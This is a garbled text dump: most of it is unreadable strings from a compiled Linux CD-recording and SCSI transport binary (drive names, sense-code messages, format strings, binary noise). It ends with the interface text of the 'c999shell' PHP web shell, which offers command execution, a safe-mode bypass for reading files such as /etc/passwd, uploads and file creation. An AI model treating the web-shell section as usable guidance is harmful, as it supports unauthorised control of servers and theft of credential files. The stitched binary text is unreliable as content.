650PHILIPSIMSKODAKHPCDD521/00CDD521/02CDD521CDD522PCD225KHSW/OBCDR-240CDD20CDD26C4324/C4325CD-Writer 6020PINNACLERCD-1000RCD5020RCD5040RCD 4X4PIONEERCD-WO DW-S114XCD-WO DR-R504XDVD-R DVR-S101PLASMONRF4100CDR4220PLEXTORCD-R PX-R24CSRICOHRO1060CSAFCD-R2004CD-R2006 CD-R2006PLUSCD-RW226CD-R4012SANYOCD-WO CRD-R24SCD-R CDU92CD-R CDU94TEACCD-R55STRAXDATATraxdataCDR4120T.YUDENCD-WO EW-50WPICDR-632PYAMAHACDR10CDR200CDR400MATSHITACD-R CW-7501CD-R CW-7502CDS615EBERTHOLDCLV/PCAVreserved(2)reserved(3)traypop-updisc changercartridge changerreserved(6)reserved(7)32162424 (I2S)Capacity: %ld Blocks = %ld kBytes = %ld MBytes = %ld prMB Mode Parameters (un-converted)Cannot load media with %s drive! restart non-streamed digital audio reads accuratelysupport Buffer-Underrun-Free recordingread fixed-packet CD media using Method 2return R-W subcode de-interleaved and error-correctedread raw P-W subcode data from lead inreturn CD media catalog numberNumber of volume control levelssupport individual volume control setting for each channelsupport independent mute setting for each channelsupport digital output on port 1support digital output on port 2set LRCK high for left-channel datahave valid data on falling edge of clocksupport ejection of CD via START/STOP commandlock media on power up via prevent jumperallow media to be locked in the drive via PREVENT/ALLOW commandcurrently in a media-locked statehave load-empty-slot-in-changer featuresupport Individual Disk Present featureCopy management revision supported Number of supported write speeds: %d error: %d scb.chk: %d sense_count: %d sense.code: 0x%x :zDMb??&3EQ]`cf ATIP start of lead in: %ld (%02d:%02d/%02d) ATIP start of lead out: %ld (%02d:%02d/%02d) Warning: using default %s data. Warning: controller creates hard SCSI failure when retrieving %s page. Warning: controller returns zero sized %s page. Warning: controller returns wrong size for %s page. Warning: controller returns wrong page %X for %s page (%X). Warning: controller does not support %s page. Mode Select DataMode Page DataCannot get %s data. Cannot get %s mask. Cannot get default %s data. Cannot get saved %s data. /etc/cdrecord.confCDR_DEVICECDR_DEVICE=,:/@%s=Bad fifo size in defaults. ""CDR_SPEEDCDR_SPEED=Bad speed environment. CDR_FIFOSIZECDR_FIFOSIZE=Bad fifo size environment. Value %lld is too large for data type 'long'. Lost connection to remote host ?? Warning: Using remote SCSI interface. Illegal value for busno, target or lun '%d,%d,%d'who are you? No passwd entry found. locuser: '%s' rscsiuser: '%s' host: '%s' rcmdsh: fork to lose parent failed. Cannot get connection to remote hostRemote status(%s): %d '%s'. Protocol error (got %s). R%d isatapiA initiator idI T%d %d %d %d filenoB%d %d havebusD%ld maxdmaS%d %d %d %d %d sendcmdfreebufF M%ld getbufsndsize: %d rcvsize: %d closeV%d versionREMOTEIllegal remote device syntaxtcpshellshell/tcp: unknown service %.*sRSCSI/opt/schily/sbin/rscsiRSHrshUnknown user: %s Cannot create socketpair. dup2 failed. setuid(%lld) failed. seteuid(%lld) failed. -lexeclp '%s' failed. O%s openREMOTE:rscsi@host:1,2,0rscsi@host:bus,target,lunREMOTE:Remote SCSI,,,,,,,,,,,,,%c %02XSense Bytes:CDB: status: 0x%x RESERVATION CONFLICTReservedCHECK CONDITIONCONDITION MET/GOODBUSYINTERMEDIATE GOOD STATUS host adapter detected error(%s%s) Received Data: Write Data: Removable not present reserved unsupported unsupported vendor specific %d TapePrinterProcessorWORMOptical StorageJuke BoxCommunicationIT8 1IT8 2Storage arrayEnclosure servicesSimple direct accessOptical card r/wBridging expanderObject based storageAutomation/Drive InterfaceWell known lununknown/no deviceunit not presentunknown device type 0x%xretryable errorfatal errorno errorerror: %d%s: scsi sendcmd: %s DMA overrun, resid: %d SCSI ALREADY RUNNING !!yesYESINTERMEDIATE CONDITION MET/GOODGot %d (0x%X), expecting %d (0x%X) bytes of data. cmd finished after %ld.%03lds timeout %ds Sending %d (0x%X) bytes of data. Executing '%s' command on Bus %d Target %d, Lun %d timeout %ds cmd timeout after %ld.%03ld (%d) sSCSI command name not set by callerCurrently running '%s' command. Cannot send SCSI cmd via ioctl ret < 0 errno: %d ux_errno: %d error: %d ;;;;;;;;;;;;;;;;;;;;<;;;<'ABBBBBuB`BKB6B!B BAAAAAAyAh@h@h@h@h@h@h@h@h@h@h@dA %s ERROR: unknow format idesrINFO: l1: 0x%lX l2: 0x%lX ATAPI/dev/cdroms/cdrom*/dev/hd[a-z]ATAPI:INFO: do scgo_open openbydevCannot open '%s'ATAPI:1,2,0sgpgATA:Cannot set SG_SET_TIMEOUT. Cannot open '/dev/hd*'Cannot open '/dev/scd*'/dev/hdPP Bus: %d /dev/pg%d/dev/pg[0-9]/dev/pg[0-9][0-9]Cannot open '/dev/pg*'Bus: %d cookie: %X file (%d,%d,%d): %d /dev/scd[0-9]/dev/scd[0-9][0-9]Can't do %d byte command. ioctl ret: %d No remote SCSI transport available. Target (%d,%d,%d): DMA max %d old max: %ld Bus: %d Target: %d Lun: %d Chan: %d Ino: %d NOT IMPELEMENTED: scgo_initiator_idERROR: with link merging! base %s link %s, result of merging %i ERROR: with link reading! link %s, result of readlink %i EXAMPLE: /dev/scsi/host1/bus2/target3/lun4/cd EXAMPLE: /dev/ide/host0/bus0/target1/lun0/cd EXAMPLE: /dev/hda or /dev/sr0 INFO: Bus: %d Target: %d Lun: %d Chan: %d Ino: %d ERROR: unknow subsystem (%s) in (%s) INFO: subsystem %s: h %i, b %i, t %i, l %iERROR: in scgo_get_first_free_shillybus(...). Too many CDROMs, more than %iIncrease MAX_SCHILLY_HOSTS in scsi-linux-ata.c and recompile!ERROR: this cdrom is already mapped %s(%d,%d,%d) INFO: /dev/%s, (host%d/bus%d/target%d/lun%d) will be mapped on the schilly bus No %d (%d,%d,%d) Warning: Using ATA Packet interface. Warning: The related Linux kernel interface code seems to be unmaintained. Warning: There is absolutely NO DMA, operations thus are slow. Illegal value for bus, target or lun '%d,%d,%d'try open(%s) return %i, errno %i, cancel errno (EACCESS), you don't have the needed rights for %s try open(%s) return %i, errno %i, trying next cdrom try open(%s) return %i errno %i calling sg_mapdev(...) INFO: scan_internal(...) failedATA Packet specific SCSI transportGeneric transport independent SCSISCSI transport for ATAPI over Parallel PortATA Packet specific SCSI transport using sg interfaceLinux sg driver version: %d.%d.%d Warning Linux Bus mapping botch. SCSI Bus: %d (mapped from %d) Use of ATA is preferred over ATAPI. SCSI unsupported with '/dev/hd*'scgo_send(%s) wrote %d bytes (expected %d). DMA (read) overrun by %d bytes (requested %d bytes). DMA addr: 0x%8.8lX size: %d - using copy buffer Allocated DMA copy buffer, addr: 0x%8.8lX size: %ld pack_len: %d, reply_len: %d pack_id: %d result: %d sense[0]: %02X host_status: %02X driver_status: %02X ioctl(CDROM_SEND_PACKET) ret: %d Supported SCSI transports for this platform:Invalid bus or target specifier in '%s'Invalid target or lun specifier in '%s'Invalid value for bus, target or lun (%d,%d,%d)WARNING: device not valid, trying to use default target... scsibus: %d target: %d lun: %d No memory for SCSI structureHELPhelpInvalid lun specifier '%s'Invalid lun specifier in '%s'scsidev: '%s' devname: '%s' scg__open(%s) %d,%d,%d diagnostic failure on component 0x%Xtagged overlapped commands, queue tag is 0x%Xdecompression exception short algorithm id of 0x%X%sSense Key: 0x%X %s%s, Segment %d Sense Code: 0x%02X Qual 0x%02X %s%s%s%s Fru 0x%X error refers to %s part, bit ptr %d %s field ptr %dlogical unit is in process of becoming readylogical unit not ready, initializing cmd. requiredlogical unit not ready, manual intervention requiredlogical unit not ready, format in progresslogical unit not ready, rebuild in progresslogical unit not ready, recalculation in progresslogical unit not ready, operation in progresslogical unit not ready, long write in progress logical unit not ready, self-test in progress asymmetric access code 3 (00-232) [proposed] asymmetric access code 1 (00-232) [proposed] asymmetric access code 2 (00-232) [proposed]auxiliary memory code 2 (99-148) [proposed]logical unit communication time-outlogical unit communication parity errorlogical unit communication crc error (ultra-dma/32) warning - specified temperature exceeded warning - enclosure degraded write error - recovered with auto reallocation write error - auto reallocation failed write error - recommend reassignment compression check miscompare error data expansion occurred during compression write error - recovery needed write error - recovery failed write error - loss of streaming write error - padding blocks added auxiliary memory code 4 (99-148) [proposed] copy target device not reachable incorrect copy target device type copy target device data underrun copy target device data overrununrecovered read error - auto reallocate faileddata re-synchronization error unrecovered read error - recommend reassignment unrecovered read error - recommend rewrite the datacannot decompress using declared algorithmerror reading upc/ean numberread error - loss of streamingauxiliary memory code 3 (99-148) [proposed]filemark or setmark not foundrecord not found - recommend reassignmentrecord not found - data auto-reallocatedmechanical positioning errorpositioning error detected by read of mediumdata sync error - data rewrittendata sync error - recommend rewritedata sync error - data auto-reallocateddata sync error - recommend reassignmentrecovered data with positive head offsetrecovered data with negative head offsetrecovered data with retries and/or circ appliedrecovered data using previous sector idrecovered data without ecc - data auto-reallocatedrecovered data without ecc - recommend reassignmentrecovered data without ecc - recommend rewrite recovered data without ecc - data rewrittenrecovered data with error corr. & retries appliedrecovered data - data auto-reallocatedrecovered data - recommend reassignmentrecovered data - recommend rewriterecovered data with ecc - data rewrittendefect list error in primary listdefect list error in grown listprimary defect list not found access controls code 1 (99-314) [proposed] access controls code 2 (99-314) [proposed] access controls code 3 (99-314) [proposed] read type operation while in write capable state write type operation while in read capable state illegal command while in explicit address model illegal command while in implicit address model access controls code 5 (99-245) [proposed] access controls code 6 (99-245) [proposed] access controls code 7 (99-245) [proposed] access controls code 8 (99-245) [proposed]$invalid cdb field while in explicit block address model$invalid cdb field while in implicit block address model&threshold parameters not supported&invalid release of persistent reservation&unsupported target descriptor type code&too many segment descriptors& unsupported segment descriptor type code& invalid operation for copy source or destination& copy segment granularity violation'logical unit software write protected(import or export element accessed)bus device reset function occurred)transceiver mode changed to single-ended)transceiver mode changed to lvd*asymmetric access code 6 (00-232) [proposed]*asymmetric access code 7 (00-232) [proposed],invalid combination of windows specified,current program area is not empty,current program area is empty,illegal power condition request0cannot read medium - unknown format0cannot read medium - incompatible format0cleaning cartridge installed0cannot write medium - unknown format0cannot write medium - incompatible format0cannot format medium - incompatible medium0cannot write - application code mismatch0 current session not fixated for append1zoned formatting failed due to spare linking5unsupported enclosure function5enclosure services unavailable5enclosure services transfer failure5enclosure services transfer refused8esn - power management class event8esn - device busy class event:medium not present - tray closed:medium not present - tray open:medium not present - loadable:medium not present - medium auxiliary memory accessible;tape position error at beginning-of-medium;tape position error at end-of-medium;tape or electronic vertical forms unit not ready;failed to sense bottom-of-form; read past beginning of medium; position past beginning of medium; medium destination element full;medium magazine not accessible;mechanical positioning or changer error>logical unit failed self-test>logical unit unable to update self-test log?changed operating definition?redundancy group created or modified? volume set created or modified?reported luns data has changed?medium auxiliary memory accessibleGdata phase crc error detectedGscsi parity error detected during st data phaseGinformation unit crc error detectedGasynchronous information protection error detectedPposition error related to timingQerase failure - incomplete erase operation detectedUinsufficient reservation resourcesUinsufficient registration resourcesUaccess controls code 4 (99-314) [proposed]Uauxiliary memory code 1 (99-148) [proposed]Zoperator medium removal requestZoperator selected write protectZoperator selected write permit]media failure prediction threshold exceeded]logical unit failure prediction threshold exceeded]spare area exhaustion prediction threshold exceeded]hardware impending failure general hard drive failure]hardware impending failure drive error rate too high]hardware impending failure data error rate too high]hardware impending failure seek error rate too high]hardware impending failure too many block reassigns]hardware impending failure access times too high]hardware impending failure start unit times too high]hardware impending failure channel parametrics]hardware impending failure controller detected]hardware impending failure throughput performance]hardware impending failure seek time performance]hardware impending failure spin-up retry count]hardware impending failure drive calibration retry count] controller impending failure general hard drive failure]!controller impending failure drive error rate too high]"controller impending failure data error rate too high]#controller impending failure seek error rate too high]$controller impending failure too many block reassigns]%controller impending failure access times too high]&controller impending failure start unit times too high]'controller impending failure channel parametrics](controller impending failure controller detected])controller impending failure throughput performance]*controller impending failure seek time performance]+controller impending failure spin-up retry count],controller impending failure drive calibration retry count]0data channel impending failure general hard drive failure]1data channel impending failure drive error rate too high]2data channel impending failure data error rate too high]3data channel impending failure seek error rate too high]4data channel impending failure too many block reassigns]5data channel impending failure access times too high]6data channel impending failure start unit times too high]7data channel impending failure channel parametrics]8data channel impending failure controller detected]9data channel impending failure throughput performance]:data channel impending failure seek time performance];data channel impending failure spin-up retry count]logical unit failure>timeout on logical unit?microcode has been changed?inquiry data has changed?component device attached?device identifier changed?redundancy group deleted?spare created or modified? spare deleted? volume set deleted? volume set deassigned? volume set reassigned?echo buffer overwritten?medium loadablePwrite append position errorSunload tape failureSmedium removal preventedUsystem buffer fullUinsufficient resources[threshold condition met[log counter at maximum[log list codes exhausted\spindles synchronized\spindles not synchronized^Bpower state change to idle^Epower state change to sleepaunable to acquire videoaout of focusdinvalid packet sizegadd logical unit failedgassign failure occurrediparity/data mismatchkredundancy level got betterkredundancy level got worsesprogram memory area is fullsrma/pma is almost fullw П  1===> >>,>;>H>T>b>o>>>>no additional sense informationfilemark detectedend-of-partition/medium detectedsetmark detectedbeginning-of-partition/medium detectedend-of-data detectedi/o process terminatedaudio play operation in progressaudio play operation pausedaudio play operation successfully completedaudio play operation stopped due to errorno current audio status to returnoperation in progresscleaning requestedno index/sector signalno seek completeperipheral device write faultlogical unit not ready, cause not reportablelogical unit does not respond to selectionno reference position foundmultiple peripheral devices selectedlogical unit communication failure track following error error log overflow warning write error error detected by third party temporary initiatorid crc or ecc errorunrecovered read erroraddress mark not found for id fieldaddress mark not found for data fieldrecorded entity not foundrandom positioning errordata synchronization mark errorrecovered data with no error correction appliedrecovered data with error correction applieddefect list errorparameter list length errorsynchronous data transfer errordefect list not foundmiscompare during verify operationrecovered id with ecc correctionpartial defect list transfer invalid command operation code!logical block address out of range"illegal function (use 20 00, 24 00, or 26 00)$invalid field in cdb%logical unit not supported&invalid field in parameter list'write protected(not ready to ready change, medium may have changed)power on, reset, or bus device reset occurred*parameters changed+copy cannot execute since host cannot disconnect,command sequence error-overwrite error on update in place.insufficient time for operation/commands cleared by another initiator0incompatible medium installed1medium format corrupted2no defect spare location available3tape length error4enclosure failure5enclosure services failure6ribbon, ink, or toner failure7rounded parameter8event status notification9saving parameters not supported:medium not present;sequential positioning error=invalid bits in identify message>logical unit has not self-configured yet?target operating conditions have changed@ram failure (should use 40 nn)@diagnostic failure on component nn (80h-ffh)Adata path failure (should use 40 nn)Bpower-on or self-test failure (should use 40 nn)Cmessage errorDinternal target failureEselect or reselect failureFunsuccessful soft resetGscsi parity errorHinitiator detected error message receivedIinvalid message errorJcommand phase errorKdata phase errorLlogical unit failed self-configurationMtagged overlapped commands (nn = queue tag)Noverlapped commands attemptedPwrite append errorQerase failureRcartridge faultSmedia load or eject failedTscsi to host system interface failureUsystem resource failureWunable to recover table-of-contentsXgeneration does not existYupdated block readZoperator request or state change input[log exception\rpl status change]failure prediction threshold exceeded^low power condition on`lamp failureavideo acquisition errorbscan head positioning errorcend of user area encountered on this trackdillegal mode for this trackevoltage faultfautomatic document feeder cover upgconfiguration failurehlogical unit not configuredidata loss on logical unitjinformational, refer to logkstate change has occurredlrebuild failure occurredmrecalculate failure occurredncommand to logical unit failedocopy protection key exchange failure - authentication failurepdecompression exception short algorithm id of nnqdecompression exception long algorithm idrsession fixation errorscd control errorECC error during verifyinterleave errorbad format on driveself test faileddefective track#volume overflow+set limit violation,error counter overflow-initiator detected error.scsi parity error/adapter parity error disk not inserted load/unload failure spindle failure focus failuretracking failurebias magnet failure#illegal function for medium type8recoverable write error9write error recovery failed:defect list update failed=defect list not availablelimited laser lifelaser focus coil over-currentlaser tracking coil over-currenttemperature alarm Transport name: %s Transport descr.: %s Transp. layer ind.: %s Target specifier: %s Target example: %s SCSI Bus scanning: %ssupported Open via UNIX device: %ssupported Error trying to open %s exclusively ... retrying in 1 second. j@>.A%s: %rError %d%s: %s. %rgetarg_bad_formatPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP˱PPPPPjPPPPPPPPPPPPPPPPPPany_otherCondition not caught:  r+wbr+ba+aba+b Y\]^,]] Y\]^,]^(NULL POINTER)UCSILCSILZODXudioxX-0x0XwkJ||Jjjjjjjjjjjejjjjjjej#jjjjjjjjjjjjjjjjjjjjj>jjjjjjj>66666D!6v,}6u60123456789abcdef0123456789ABCDEF; A3( 4@ 4\ 4t 5 D7 7 = > >$ D@@ A` Ax A B $C I J N, NP Ot $P P TR R S $T< T` U DV V W DXX($YLYlZ[\]d^$_<_`T``aabTc dc8d\dd|deTfg Dg$gDDhd$ii4jjkl(mHnhopDqtrTsDw8tzX{x|4}}~T8ĀX4xT$TDd$4TttԴ t,Dd$|tDDĿ(dHhT$48TttT4t(@`4DTdt,D\tT$T$$D\Dt$t$@`t|T $$T<TlD$$D($HD`d 4, DD d  4  4 !D$!TH&4?h&T@&4A&DA&A&B&4B'dB,'BH'4Ch'dC'D'E'E'E($F (DF8(FX(Gx(G(H(H(I(J)J)4K8)tKT)DLt)dL)L)L)L)4M)dM *dN,*NL*Nd*$Y*dY*Y*Z*Z*tZ +[(+[D+[\+\x+d\+^+_+_+`,`(,$`@,T`X,`t,Da,4b,db,b,b-b-c8-d\-d-d-e-De-f-g.h4.DuT.up.u.u.v.$v.v.w /yD/Dzd/| `$AB 0vAB AL>AB dP>AB |&AB FJAB D(UD  F AB DpAB /AB 0AB G0DAB FPAB h0AB PAB HD ~AB BAB DpAB E0OAB E AB IFF @pAB IFFdPCAB A AB IFF`mAB F гAB FFF pAB FFF AB E ,AB FFF P`AB FFFtAB F AB FFF pAB FFF AB IFF1AB  AB FFF<AB F\`AB F| 1AB I `AB FFF AB IIU  AB FFF AB IFF ,AB FIFPP|AB E pAB FFF pAB FFF"AB 0AB FAB F AB  (AB FFFLPAB J lAB FFF pAB FFF @AB FFF AB FIF@AD tAB E4@zAB ETAB E tAB FFF0zAB FF{AB E0RAB FFAB IPAB F80AB FXAB F x[AB IQF`RAB J .AG IQF AB FFI  AB IL`( +AB IH gAB Ih `AB F PRAB J AB FFF pAB FFF @AB D rAB D( PAB FIH @eAB I h AB IFF pAB FFF `AB FF AB I AB IFT pQ AB I4 .AB O[T AB Dp AB I 0 OAB FF AB  WAB II ,AB  0 AB GGF$ [AG MD AB FFd 01AB F pvAB I ?AB L 0AB  P:AB I SAD FG %AB 4 hAB OT  AG l LAB   AG  AB AI [AB A AB AD }AB AJ@!AB I[8"fAB FLXP#AB IIx#(AB $(AB 0$AB IZ%AB IW%AB II &AB C((XAB DD)AB F d*AB FFH+AB IIp,AB GF@-AB U`5MAB 5<AB 5AB 06<AB FFP@6CAB FFp6AB D6AB 6AB 6AB 6AB 6AB 7AB 7AB 4072AB Lp7AB d7CAB D76AB D8:AB D P8NAB FFF8#AD 8AB F9AB F4P:0AB L:?AB d:ZAB F <zAB IF<AB LF `=AG FFF =AB IFF >AD FFF0P?=AG FFP?^AB Dl?2AB E0CAB PCAB FC*AB DnAB FpD)AB D#AB ,D*AB DE(AB \0EAB L|EfAB D0FdAG EFAB FHAB IIIWAB FL JqAB WI8JAB PJGAG FFpKAB D0KAB FMAB D MAB FFFpN AG N0AB N AG 4NXAB BT OZAB PtO*AB OXAB BPZAB PpP AG P0AB PAD PAB ,PAD DP AG \P AG tQAD Q!AB @Q!AB pQAB QAB QAB QAB QAB 4RAB L0ReAG DhR-AD R#AB IIT&AB D0TAB F VAB LEF pXlAB FFF$XAG FDYAG FdZAB R[#AB \ AB IhAB FmMAB `mAB DPn6AB A,nCFB Dn1AB AJd pAB BF s0 AB IPAB AJ`AB IPAB FIAB II$AB <AB DXPAB Bxp"AB D[AB IAB I TAG FFFAB F =AB I8`JAB EXAB FxСAB FFAD AB KI`0AB DAB &AD _AB D8@gAB FX#AB  pAB FFFAB FsAB EXAB Dp0AB FFAB (PAB FHsAB ChnAB AB F "AB P"AB AB F "AB PYAB L(:AB DDAB IEdAB |'AB D!AB @*AB Dp:AB .AB AB C 8AB AC< 7AB T `@ AB It 2AB  RAB F @3AB  AB  ]AB FE AB G!AB G4! ,AB L!P)AB Ah!QAB D!?AB F ! ]AB ACC!AB F!p AG " AG " AG 0"*AB H"fAB Dd"@|AB D "AB FHF"&AB "-AB D"AB "07AB A #pAB D (#0AB FFI L#0AB ACCp#0.AD A#`.AD A#.AD A#AB F#AB BF$ ZAD AC$$> AB ID${AB A`$@AB x$`AB $p AB $AB $lAB A$-AB F$@NAB FzR| I#AB E<JAB E Ԏ ohhq /  oooĊoto(oto04pb?? `c+P̯p>`U `p:D jòSP0@9T]@EPչLiP0pٳ !VPspk`f`hXAF<h0iвK@0@,p4LW, 9޲ZUoӹPo C@PүЮ3Ep^ h &p,`5@-*%)(%0$$#P#remote-1.16schily@(#)scsi-remote.c 1.16 04/08/24 Copyright 1990,2000-2003 J. Schilling0.8schily@(#)scsitransp.c 1.91 04/06/17 Copyright 1988,1995,2000-2004 J. SchillingPZ`m sY0TpXTOPpP0RRQPP@QRQQPPPPQQQPpQQRQQPPPPQQscsihack.c-1.43schily@(#)scsihack.c 1.43 03/11/28 Copyright 1997,2000,2001 J. SchillingNmhXNpXTN O[ORscsi-linux-ata.c-1.7@(#)scsi-linux-ata.c 1.7 04/06/12 Copyright 2002 J. Schillingscsi-linux-sg.c-1.83-RH@(#)scsi-linux-sg.c 1.83 04/05/20 Copyright 1997 J. Schillingscsi-linux-pg.c-1.43@(#)scsi-linux-pg.c 1.43 04/01/15 Copyright 1997 J. Schilling`IIIIIIJ,JOJpJJJJKK6KLK>>lK $ \    (XLKKKL|>5L>>?-?MLbL4lLTA?4Tt|LZ?8\LLw??????@@3@@pN@LM0Mj@}@@0LM\|hM$M@P|@xM@@<hAMAN$NFN:A`NNNN$TPNXArAOHOAD_O|OAAAA<\B,BOJBeBBBBO OBB0BXPC1CJCcC{C0PcPC4XxC|PPPP8dCCQC,QDQQeQyQ@dQQQ/DQ R D d  R   IDXDdD,!DDP!Dp!!DD!EE8EQE!@RdRlEE"("REX"EEEx" F(FDF"TFiFF"FF"RRS8SkS{SSSS#0#d##S T$T:TPT|TTTF#T#TUFF UHUG $)GH$p$$dUUUU$$%UBG\GuGUGG V<%l%%%&L&&&&('`''''0(d((()P))))4*h*** +@++++4,p,,, -X---.8.x.../L////0D0x0001H1111(2\2222(3\333484p4445L55556P664V66707\7G|7G7MV\VGHvVV7V(HVV78@8Wt8>H888989XH\999-WKW9rHgWWHHWWWX:@::::@XtXX,;X;;;;X<8<\<|<HHXXXY"Y4YFY\YuYYYYYYYZZ0ZSZmZZZZZZ[file_write_err #?*&+?bad_filebad_file_modebad_file_op(NaN)(Infinity)`e dddevdump.debugӕELF4 4 (444444XHHH Ptd||a|a  Qtd 44HH !ohh<+ 3/;oĊ Ho pW  `   iԎdoxIu]{  ^Z |a| kt%  l``  \   .shstrtab.interp.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.ctors.dtors.jcr.dynamic.got.got.plt.data.bss.gnu_debuglink.dynbss.gnu.liblist.gnu.conflict.gnu.prelink_undo 4q4HqH 3hqhBot(t !ohh<+ ;oĊHopW  `  iԎdo$xIum{  nZ |a| kt%!  !!!!!l``# 0   0P  0 0Dd5

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0064 ]--